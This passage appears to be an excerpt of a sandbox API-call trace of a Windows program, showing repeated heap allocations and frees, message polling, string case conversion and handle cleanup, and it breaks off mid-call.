CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.973] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.973] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.973] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.973] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.974] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.974] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.974] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.974] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.974] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.974] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.975] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.975] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.975] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.975] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.975] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.975] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.975] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.975] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.975] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.975] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.975] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.976] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.976] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.976] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.976] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.976] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.976] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.976] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.976] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.976] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.976] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.976] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.976] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.976] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.976] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.976] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.977] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.977] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.977] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.977] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.977] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.977] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.979] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.979] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.980] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.980] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.980] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.980] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.981] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.981] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.981] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.981] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.982] CloseHandle (hObject=0x2cc) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.985] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0256.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.987] CloseHandle (hObject=0x1f8) returned 1 [0256.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0256.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 